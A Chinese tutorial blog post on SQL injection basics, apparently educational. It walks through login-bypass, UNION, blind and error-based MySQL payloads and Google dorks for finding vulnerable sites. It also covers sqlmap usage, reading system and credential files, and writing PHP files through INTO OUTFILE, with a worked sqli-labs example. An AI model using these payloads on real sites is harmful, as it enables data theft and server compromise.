<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.7.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/img/favicon.ico">
  <link rel="mask-icon" href="/images/favicon.ico" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"tea9.xyz","root":"/","scheme":"Mist","version":"8.0.0-rc.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="sql注入基础">
<meta name="keywords" content="sql注入,web安全">
<meta property="og:type" content="article">
<meta property="og:title" content="1.sql注入基础">
<meta property="og:url" content="http://tea9.xyz/post/2159052339.html">
<meta property="og:site_name" content="tea9的博客">
<meta property="og:description" content="sql注入基础">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2020-11-07T05:04:34.675Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="1.sql注入基础">
<meta name="twitter:description" content="sql注入基础">

<link rel="canonical" href="http://tea9.xyz/post/2159052339.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>1.sql注入基础 | tea9的博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  
</head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line toggle-line-first"></span>
        <span class="toggle-line toggle-line-middle"></span>
        <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta custom-logo">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">tea9的博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">加油</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>

    </header>
<!-- <p  style='color:#008080 ;text-align:center;' id="hitokoto">正在加载一言...</p> -->
<div style='color:#008080 ;text-align:center;' id="hitokoto" class="hitokoto-fullpage animated fadeIn">
          
          <div class="word" id="hitokoto_text">正在加载一言...</div>
          
          <div class="author" id="hitokoto_author"></div>
        </div>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

  <a href="https://github.com/tea9" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://tea9.xyz/post/2159052339.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="tea9">
      <meta itemprop="description" content="心中有光の孩子">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="tea9的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          1.sql注入基础
        </h1>

        <div class="post-meta">
          
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2018-10-11 00:00:00" itemprop="dateCreated datePublished" datetime="2018-10-11T00:00:00+08:00">2018-10-11</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-11-07 13:04:34" itemprop="dateModified" datetime="2020-11-07T13:04:34+08:00">2020-11-07</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/category/安全/" itemprop="url" rel="index"><span itemprop="name">安全</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/category/安全/web安全/" itemprop="url" rel="index"><span itemprop="name">web安全</span></a>
                </span>
            </span>

          
            <div class="post-description">sql注入基础</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h2><!-- MarkdownTOC -->
<ul>
<li>SQL注入原理<ul>
<li>SQL注入原理-SQL注入产生原因</li>
<li>SQL注入原理-SQL注入核心原理</li>
</ul>
</li>
<li>SQL注入的危害</li>
<li>mysql注入语句<ul>
<li>mysql注入语句-mysql介绍</li>
<li>mysql注入语句-万能密码</li>
<li>mysql注入语句-注入语句例子</li>
</ul>
</li>
<li>sql注入流程</li>
<li>MySQL手工注入方法</li>
<li>TIPS</li>
<li>实例</li>
<li>相关链接</li>
</ul>
<!-- /MarkdownTOC -->
<h2 id="SQL注入原理"><a href="#SQL注入原理" class="headerlink" title="SQL注入原理"></a>SQL注入原理</h2><h3 id="SQL注入原理-SQL注入产生原因"><a href="#SQL注入原理-SQL注入产生原因" class="headerlink" title="SQL注入原理-SQL注入产生原因"></a>SQL注入原理-SQL注入产生原因</h3><blockquote>
<p>基于B/S架构的网络上，对安全控制能力较弱，然后开发人员水平和经验参差不齐，没有对用户输入数据，或者对页面中携带的信息进行必要的判断。攻击者利用这个机会提交一段数据库查询代码，可以获得一些数据库信息。</p>
</blockquote>
<h3 id="SQL注入原理-SQL注入核心原理"><a href="#SQL注入原理-SQL注入核心原理" class="headerlink" title="SQL注入原理-SQL注入核心原理"></a>SQL注入原理-SQL注入核心原理</h3><blockquote>
<p>SQL注入是一种将恶意的SQL代码插入到用户的输入参数中的攻击，攻击者探测出开发者编程过程中的漏洞，利用漏洞，巧妙的构造SQL语句，对数据库的内容进行检索或修改。</p>
</blockquote>
<blockquote>
<p>简单概括：利用现有应用程序，将精心构造的SQL语句“注入”到后台数据库所执行的恶意操作</p>
</blockquote>
<hr>
<blockquote>
<p>灵活的SQL查询语句+用户输入的数据带入可执行SQL语句=用户直接操作数据库-&gt;SQL注入漏洞</p>
</blockquote>
<h2 id="SQL注入的危害"><a href="#SQL注入的危害" class="headerlink" title="SQL注入的危害"></a>SQL注入的危害</h2><ul>
<li>数据库信息泄露：数据库中存放的用户的隐私信息的泄漏。</li>
<li>网页篡改：通过操作数据库对特定网页进行篡改。</li>
<li>网站被挂马，传播恶意软件：修改数据库一些字段的值，嵌入网马链接，进行挂马攻击。</li>
<li>数据库被恶意操作：数据库服务器被攻击，数据库的系统管理员账户被篡改。</li>
<li>服务器被远程控制，被安装后门。经由数据库服务器提供的操作系统支持，让黑客得以修改或控制操作系统。</li>
<li>破坏硬盘数据，瘫痪全系统</li>
</ul>
<h2 id="mysql注入语句"><a href="#mysql注入语句" class="headerlink" title="mysql注入语句"></a>mysql注入语句</h2><h3 id="mysql注入语句-mysql介绍"><a href="#mysql注入语句-mysql介绍" class="headerlink" title="mysql注入语句-mysql介绍"></a>mysql注入语句-mysql介绍</h3><blockquote>
<p>MySQL是一个关系型数据库管理系统，由瑞典MySQL AB 公司开发，目前属于 Oracle 旗下产品。MySQL 是最流行的关系型数据库管理系统之一，在 WEB 应用方面，MySQL是最好的 RDBMS (Relational Database Management System，关系数据库管理系统) 应用软件。<br>MySQL是一种关系数据库管理系统，关系数据库将数据保存在不同的表中，而不是将所有数据放在一个大仓库内，这样就增加了速度并提高了灵活性。<br>MySQL所使用的 SQL 语言是用于访问数据库的最常用标准化语言。MySQL 软件采用了双授权政策，分为社区版和商业版，由于其体积小、速度快、总体拥有成本低，尤其是开放源码这一特点，一般中小型网站的开发都选择 MySQL 作为网站数据库。</p>
</blockquote>
<p>– 摘自百度百科  </p>
<h3 id="mysql注入语句-万能密码"><a href="#mysql注入语句-万能密码" class="headerlink" title="mysql注入语句-万能密码"></a>mysql注入语句-万能密码</h3><pre><code># 登录处正常的SQL语句：
select * from users where username= &#39;admin&#39; and pwd = &#39;pass&#39;;

# 万能密码：
&#39;or &#39;1&#39; = &#39;1 

# 带入用户输入参数
select * from users where username= &#39;&#39;or &#39;1&#39; = &#39;1&#39; and pwd = &#39;&#39;or &#39;1&#39; = &#39;1&#39;;

第一个 or 前面为 false 后面为 true -&gt; true
and 前面为 true 后面为 false -&gt; false
第二个 or 前面为 false 后面为 true -&gt; true
</code></pre><h3 id="mysql注入语句-注入语句例子"><a href="#mysql注入语句-注入语句例子" class="headerlink" title="mysql注入语句-注入语句例子"></a>mysql注入语句-注入语句例子</h3><pre><code># 利用构造1=2错误执行union后面的语句
and 1=2 union select 1,2,3--

# 利用mysql正则表达式为匹配当前用户是否为ro开头
select user() regexp &#39;^ro&#39;

# 查询当前用户的ascii码是否为114（r）
ascii(substr(substr(select user()),1,1))=114

# 如果当前用户的ascii码为114（r） 就返回0 否则就睡5秒
if(ascii(substr((select user()),1,1))=114,0,sleep(5))

# 查询第一个表名的ascii码是否为99（c） 是返回1 否返回0
(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=99)

# 利用updatexml报错，返回版本信息
updatexml(1,concat(0x7e,(select @@version),0x7e),1)
</code></pre><h2 id="sql注入流程"><a href="#sql注入流程" class="headerlink" title="sql注入流程"></a>sql注入流程</h2><ol>
<li><p><strong>目标搜集：</strong><br> 无特定目标：  </p>
<pre><code> inurl:php?id=
</code></pre><p> 有特定目标：  </p>
<pre><code> inurl:php?id= site:target.com
</code></pre><p> 工具爬取：  </p>
<pre><code> spider，对搜索引擎和目标网站的链接进行爬取
</code></pre></li>
<li><p><strong>注入识别：</strong><br> 手工简单识别：  </p>
<pre><code> &#39;
 and 1=1 / and 1=2
 and &#39;1&#39; =&#39;1 / and &#39;1&#39;=&#39;2
 and 1 like 1 / and 1 like 2
</code></pre><p> 工具识别：  </p>
<pre><code> sqlmap -m filename (filename中保存检测目标)
 sqlmap --crawl (sqlmap对网站进行爬取，然后依次进行测试)
</code></pre></li>
</ol>
<ol start="3">
<li><p><strong>高级识别：</strong>  </p>
<p> 扩展识别广度和深度：  </p>
<pre><code> sqlmap --level 增加测试级别，对header中相关参数也进行测试
 sqlmap -r filename(filename中为网站请求数据)
</code></pre><p> 利用工具提高识别效率：  </p>
<pre><code> BurpSuite + SqlMap
</code></pre><p> Tips:  </p>
<pre><code> 可以在参数后键入 “*” 来确定想要测试的参数  
 可能出现注入的点：新闻、登录、搜索、留言......  
 站在开发的角度去寻找  
</code></pre></li>
<li><p><strong>代码审计：</strong>  </p>
<p> 搜索关键代码和函数  </p>
<pre><code> 关键代码包括 $_GET/$_POST/$id/select/SELECT
</code></pre><p> 梳理业务流程  </p>
</li>
</ol>
<h2 id="MySQL手工注入方法"><a href="#MySQL手工注入方法" class="headerlink" title="MySQL手工注入方法"></a>MySQL手工注入方法</h2><p><strong>MySQL数据库结构</strong>  </p>
<ul>
<li>Mysql<ul>
<li>连接层<ul>
<li>通信协议</li>
<li>线程</li>
<li>验证</li>
</ul>
</li>
<li>SQL层<ul>
<li>解析器</li>
<li>授权</li>
<li>优化器</li>
<li>查询执行</li>
<li>查询高速缓存</li>
<li>查询日志记录</li>
</ul>
</li>
</ul>
</li>
</ul>
<p><strong>SQL层的功能</strong>      </p>
<ol>
<li>判断语法、语句、语义</li>
<li>数据库对象授权情况判断，授权失败不继续</li>
<li>解析（解析器）：将sql语句解析成执行计划，运行执行计划，生成找数据的方式</li>
<li>优化（优化器）：运行执行计划，基于算法，从执行计划中选择代价最小的交给“执行器”</li>
<li>执行（执行器）：运行执行计划，最终生产如何去磁盘找数据方式</li>
<li>将取数据的方式，交由下层（存储引擎层）进行处理</li>
<li>最终将取出的数据抽象成管理员或用户能看懂的方式（表），展现在用户面前</li>
<li>查询缓存：缓存之前查询的数据</li>
</ol>
<p><strong>MySQL内置库（&gt;=5.7）</strong>  </p>
<p>mysql: 账户信息、权限信息、存储过程、event、时区等信息。  </p>
<p>sys: 存储过程、自定义函数、视图帮助我们快速的了解系统的元数据信息。（元数据是关于数据的数据，如数据库名或表名，列的数据类型，或访问权限等）  </p>
<p>performance_schema: 用于收集数据库服务器性能参数  </p>
<p>information_schema: 访问数据库元数据的方式，保存关于MySQL服务器所维护的所有其他数据库信息，如数据库名，数据库表，表的数据类型与访问权限等。</p>
<p><strong>查询数据核心语法</strong>  </p>
<pre><code># 查库
select schema_name from information_schema.schemata;

#查表
select table_name from information_schema.tables where table_schema=库名;

#查列
select column_name from information_schema.columns where table_name=表名;

#查数据
select 列名 from 库名.表名;
</code></pre><p><strong>Tips</strong>  </p>
<p>提示1: 所有类型的sql注入，都是基于查库、表、列语句<br>提示2: 如果数据太多，导致无法返回查询结果：<br>    查询的场景：可利用limit限定返回数量及为止，依次查询<br>    <code>select username,password from security.users limit 0,1;</code><br>    回显数据的场景：<em> concat </em> 链接多个数据成为一条返回结果<br>    <code>select group_concat(schema_name) from infromation_schema.schemata;</code><br>提示3: 在一些场景，想要快速获取数据，需要借助工具，如：BurpSuite  </p>
<p><strong>sql注入流程</strong>  </p>
<p><a href="http://naotu.baidu.com/file/18232e9bd73bf191df5d048930c001bf?token=86fd9c0a184789f3" target="_blank" rel="noopener">思维导图</a>  </p>
<ul>
<li>SQL注入<ul>
<li>信息搜集<ul>
<li>数据库类型<ul>
<li>报错信息 </li>
<li>特有语句（不同数据库版本）</li>
</ul>
</li>
<li>数据库版本</li>
<li>数据库用户</li>
<li>判断数据库权限</li>
</ul>
</li>
<li>数据获取<ul>
<li>获取库信息<ul>
<li>获取当前库</li>
<li>获取所有库</li>
</ul>
</li>
<li>获取表信息</li>
<li>获取列信息</li>
<li>获取数据</li>
</ul>
</li>
<li>提权<ul>
<li>根据数据库权限<ul>
<li>执行系统命令<ul>
<li>直接提权（<ul>
<li>mssql：调用xp.cmdshell执行系统命令、</li>
<li>mysql：写木马到网站目录、</li>
<li>sqlmap  <code>--os-shell（os shell会上传两个文件一个木马  一个是创建文件 富于这个文件775的权限控制权限））</code></li>
</ul>
</li>
</ul>
</li>
<li>读文件<ul>
<li>读数据库配置文件,尝试远程连接</li>
<li>读系统配置文件，搜集信息<ul>
<li><code>select load_file(&#39;/etc/password&#39;)</code></li>
</ul>
</li>
</ul>
</li>
<li>写文件<ul>
<li>写webshell到网站目录 <ul>
<li>outfile (需要绝对路径) <code>（格式： select * into outfile &quot;文件地址&quot; 示例：select * info outfile &#39;f:/mysql/test/one&#39; form teacher_class; ）</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="TIPS"><a href="#TIPS" class="headerlink" title="TIPS"></a>TIPS</h2><p>mysql写shell</p>
<blockquote>
<p>1.需要知道绝对路径(web下层目录)<br>2.用户需要file权限(root可写)，一般用户不会有file权限<br>3.文件大小小于max_allow_upload<br>4.secure_file_priv 指定可写目录</p>
</blockquote>
<p>写</p>
<pre><code>select &#39;&lt;?php phpinfo();?&gt;&#39; into outfile &#39;c://php//www//kkk.php&#39;;
select &#39;&lt;?php phpinfo();?&gt;&#39; into dumpfile &#39;c://php//www//kkk2.php&#39;;
select * from user into outfile &#39;c://php//www/kkk4.php&#39; fields terminated by &#39;&lt;?php phpinfo();?&gt;&#39;
</code></pre><hr>
<h2 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h2><p>tips:  </p>
<blockquote>
<p>查询数据的时候把信息记录到txt上</p>
</blockquote>
<pre><code># 判断是否存在sql注入 
http://127.0.0.1/Less-1/?id=2&#39; 
http://127.0.0.1/Less-1/?id=2&#39; and &#39;1&#39;=2

# 判断列数
http://127.0.0.1/Less-1/?id=2&#39; order by 3--+

# 判断输出信息位置 (union之前要报错才会查询union后面的)
http://127.0.0.1/Less-1/?id=99999&#39; union select 1,2,3--+

# 查库名
http://127.0.0.1/Less-1/?id=&#39; union select 1,2,（select group_concat(schema_name) from information_schema.schemata--+

# 查表名 &#39;security&#39;/十六进制0x/database()
http://127.0.0.1/Less-1/?id=&#39; union select 1,2,（select group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;--+

# 查数据 group_concat/concat_ws
http://127.0.0.1/Less-1/?id=&#39; union select 1,2,（select group_concat(username,0x7e,password) from security.users)--+

# 查权限
http://127.0.0.1/Less-1/?id=&#39; union select 1,2,(select user())--+ 

&gt; root@localhost 

#  读文件 db-creds.inc 数据库配置文件
http://127.0.0.1/Less-1/?id=&#39; union select 1,2,(select load_file(&#39;/var/www/html/sql-connections/db-creds.inc&#39;))--+ 
</code></pre><h2 id="相关链接"><a href="#相关链接" class="headerlink" title="相关链接"></a>相关链接</h2><p><a href="https://www.mysql.com/" target="_blank" rel="noopener">mysql官网</a><br><a href="https://dev.mysql.com/doc/refman/5.7/en/dynindex-function.html" target="_blank" rel="noopener">mysql内置函数</a><br><a href="http://ascii.911cha.com/" target="_blank" rel="noopener">ascii对照表</a><br><a href="http://www.runoob.com/mysql/mysql-regexp.html" target="_blank" rel="noopener">mysql正则</a><br><a href="https://blog.csdn.net/vspiders/article/details/77430024" target="_blank" rel="noopener">MYSQL updatexml报错注入</a><br><a href="https://blog.csdn.net/i_peter/article/details/53380334" target="_blank" rel="noopener">Python Spider 的总结</a><br><a href="https://blog.csdn.net/hxsstar/article/details/19337461" target="_blank" rel="noopener">MySQL手工注入步骤+直接写入一句话</a><br><a href="https://blog.csdn.net/m2417599488/article/details/72236666" target="_blank" rel="noopener">Mysql通过命令授于用户数据库操作权限</a><br><a href="https://blog.csdn.net/zhaoyangjian724/article/details/52121193" target="_blank" rel="noopener">mysql 函数执行权限</a>  </p>

    </div>

    
    
    
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.jpg" alt="tea9 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.jpg" alt="tea9 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tag/sql注入/" rel="tag"><i class="fa fa-tag"></i> sql注入</a>
              <a href="/tag/web安全/" rel="tag"><i class="fa fa-tag"></i> web安全</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/post/3180077102.html" rel="prev" title="xss的语句">
      <i class="fa fa-chevron-left"></i> xss的语句
    </a></div>
      <div class="post-nav-item">
    <a href="/post/3612980045.html" rel="next" title="termux相关">
      termux相关 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#目录"><span class="nav-number">1.</span> <span class="nav-text">目录</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL注入原理"><span class="nav-number">2.</span> <span class="nav-text">SQL注入原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入原理-SQL注入产生原因"><span class="nav-number">2.1.</span> <span class="nav-text">SQL注入原理-SQL注入产生原因</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入原理-SQL注入核心原理"><span class="nav-number">2.2.</span> <span class="nav-text">SQL注入原理-SQL注入核心原理</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL注入的危害"><span class="nav-number">3.</span> <span class="nav-text">SQL注入的危害</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mysql注入语句"><span class="nav-number">4.</span> <span class="nav-text">mysql注入语句</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#mysql注入语句-mysql介绍"><span class="nav-number">4.1.</span> <span class="nav-text">mysql注入语句-mysql介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#mysql注入语句-万能密码"><span class="nav-number">4.2.</span> <span class="nav-text">mysql注入语句-万能密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#mysql注入语句-注入语句例子"><span class="nav-number">4.3.</span> <span class="nav-text">mysql注入语句-注入语句例子</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql注入流程"><span class="nav-number">5.</span> <span class="nav-text">sql注入流程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MySQL手工注入方法"><span class="nav-number">6.</span> <span class="nav-text">MySQL手工注入方法</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TIPS"><span class="nav-number">7.</span> <span class="nav-text">TIPS</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#实例"><span class="nav-number">8.</span> <span class="nav-text">实例</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#相关链接"><span class="nav-number">9.</span> <span class="nav-text">相关链接</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">tea9</p>
  <div class="site-description" itemprop="description">心中有光の孩子</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">386</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">61</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">166</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/tea9" title="GitHub → https://github.com/tea9" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/tr1tea" title="Weibo → https://weibo.com/tr1tea" rel="noopener" target="_blank"><i class="fab fa-weibo fa-fw"></i>Weibo</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.google.com/search?q=怎么可能有女朋友" title="https://www.google.com/search?q=怎么可能有女朋友" rel="noopener" target="_blank">女朋友</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.google.com/search?q=怎么可能有男朋友" title="https://www.google.com/search?q=怎么可能有男朋友" rel="noopener" target="_blank">男朋友</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://tea9.xyz" title="https://tea9.xyz">Tea9</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.julydate.com" title="https://www.julydate.com" rel="noopener" target="_blank">七夏浅笑</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.zhangqirun.cn" title="https://www.zhangqirun.cn" rel="noopener" target="_blank">童年是个风筝的博客</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://townwang.com" title="https://townwang.com" rel="noopener" target="_blank">文科中的技术宅</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://sunbossrs.github.io" title="https://sunbossrs.github.io" rel="noopener" target="_blank">耀日庄主的博客</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://gloomyghost.com/" title="http://gloomyghost.com/" rel="noopener" target="_blank">gloomyghost</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.fghrsh.net" title="https://www.fghrsh.net" rel="noopener" target="_blank">FGHRSH</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://a632079.me" title="https://a632079.me" rel="noopener" target="_blank">藤の青</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.vseu.com/" title="https://www.vseu.com/" rel="noopener" target="_blank">幸运草</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://nekohome.moenya.cat" title="https://nekohome.moenya.cat" rel="noopener" target="_blank">NekoHome 喵窝</a>
        </li>
        <li class="links-of-blogroll-item">
